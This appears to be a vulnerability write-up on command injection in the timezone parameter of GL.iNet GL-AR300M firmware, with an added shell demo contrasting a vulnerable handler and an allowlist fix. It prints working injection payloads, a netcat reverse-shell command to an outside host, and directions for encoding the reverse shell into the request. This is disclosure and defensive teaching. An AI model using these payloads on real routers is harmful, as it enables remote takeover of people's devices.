Remote Command Execution on GL.iNet's mini-routers
Preparation
Product: GL-AR300M
Firmware version: 2.27
Command Injection
Intercept HTTP Request
When we start the device for the first time and log in to the web interface, we are asked to set the language and the timezone.
Using Fiddler to capture the HTTP request:
When we perform this action, the login_cgi script takes the content of the timezone parameter and writes it into the /tmp/TZ file:
Request Forgery
login_cgi
If we try to submit a value that is not in the list of timezones, the script rejects it:
We can bypass this check and write whatever we want into the TZ file, using this payload:
|echo+TEST||a+#'+ ||a #
Replace the payload with:
|echo+TEST||a+#'+|echo `cat /etc/passwd` ||a #
So I can execute commands on the router. On my remote machine I listen on port 12345 with nc -lvp 12345. Now, let's replace the command in the payload with a netcat reverse shell (BusyBox netcat takes the host and the port as separate arguments):
nc 192.168.17.130 12345 -e /bin/ash
At this point I have the router's shell on my remote machine.
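The following shell script is an added example, not code from this writeup or from GL.iNet's firmware (the login_cgi source is not shown here). It reproduces the pattern the payloads above exploit: a handler that splices the timezone value into a command string inside single quotes and hands it to a shell, so a value containing a closing quote followed by |command ||a # runs the command and comments out the rest of the line (including the redirection to the TZ file). Beside it is a hardened handler that accepts only an exact match from an allowlist and never re-parses the value through a shell, and a helper that percent-encodes a payload for the request body (the + for spaces in the payloads above is form encoding; #, | and ' need encoding too, otherwise # in a URL is treated as a fragment delimiter). The temporary paths, the three-entry timezone list and the touch-based marker are constructed for the demo; the page does not show why the firmware's own list check let the payload through, so the allowlist check here is a generic exact match rather than a reconstruction of it.

```shell
#!/bin/sh
# Added demo (not GL.iNet code): a hypothetical login_cgi-style handler that
# copies the "timezone" form value into a TZ file by building a shell command.
# Paths, allowlist and the "touch" marker are constructed for the demo.

WORKDIR=$(mktemp -d)
TZ_FILE="$WORKDIR/TZ"          # stands in for /tmp/TZ
MARKER="$WORKDIR/injected"     # created only if the injected command runs
trap 'rm -rf "$WORKDIR"' EXIT

# Vulnerable pattern: the untrusted value is spliced into a command string
# inside single quotes and the string is re-parsed by a shell. The quotes
# only protect against values that contain no single quote themselves.
vuln_set_timezone() {
    tz="$1"
    sh -c "echo '$tz' > '$TZ_FILE'"
}

# Constructed three-entry allowlist standing in for the firmware's timezone table.
ALLOWED_TZ="UTC
Europe/Rome
America/New_York"

# Hardened handler: exact, fixed-string match against the allowlist (-x -F,
# so neither a substring nor a regex can match) and the value is written
# without ever being interpreted as shell syntax.
safe_set_timezone() {
    tz="$1"
    if printf '%s\n' "$ALLOWED_TZ" | grep -qxF -- "$tz"; then
        printf '%s\n' "$tz" > "$TZ_FILE"
        return 0
    fi
    return 1
}

# Same shape as the page's payload: <quoted junk>' | <command> ||a #
# The lone ' closes the handler's quote, |<command> runs, ||a is never
# reached, and # comments out the remainder (the "> /tmp/TZ" redirection).
PAYLOAD=$(printf "|echo TEST||a #'|touch %s ||a #" "$MARKER")

# Percent-encode a payload for an application/x-www-form-urlencoded body:
# spaces become +, everything outside the unreserved set becomes %XX.
urlencode() {
    s="$1"
    out=""
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}          # first character
        s=${s#?}                 # drop it
        case $c in
            [a-zA-Z0-9._~-]) out="$out$c" ;;
            ' ')             out="$out+" ;;
            *)               out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s' "$out"
}

# Returns 0 when the vulnerable handler ran the injected command and, because
# of the trailing # comment, never wrote the TZ file at all.
demo_vulnerable() {
    rm -f "$MARKER" "$TZ_FILE"
    vuln_set_timezone "$PAYLOAD"
    [ -f "$MARKER" ] && [ ! -f "$TZ_FILE" ]
}

# Returns 0 when the hardened handler rejects the payload and touches nothing.
demo_safe_rejects() {
    rm -f "$MARKER" "$TZ_FILE"
    if safe_set_timezone "$PAYLOAD"; then
        return 1
    fi
    [ ! -f "$MARKER" ] && [ ! -f "$TZ_FILE" ]
}

# Returns 0 when the hardened handler writes a legitimate value verbatim.
demo_safe_accepts() {
    rm -f "$TZ_FILE"
    safe_set_timezone "Europe/Rome" || return 1
    [ "$(cat "$TZ_FILE")" = "Europe/Rome" ]
}

if demo_vulnerable; then
    echo "vulnerable handler: injected command ran, TZ file never written"
fi
if demo_safe_rejects && demo_safe_accepts; then
    echo "hardened handler: payload rejected, Europe/Rome written"
fi
echo "payload as it must appear in the request body:"
echo "timezone=$(urlencode "$PAYLOAD")"
```

The reverse shell from the writeup is the same trick with a different command after the closing quote: swap the touch in PAYLOAD for the nc line and encode the result with urlencode before putting it in the timezone parameter. The hardened handler rejects any value that is not byte-for-byte one of the known timezone names, so there is no quoting to break out of in the first place.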
download_file and storage_cgi
The device can share the files on a USB storage device over the network and lets us download them. If we try to download /etc/passwd, the web server responds with Access Denied, but we can bypass it.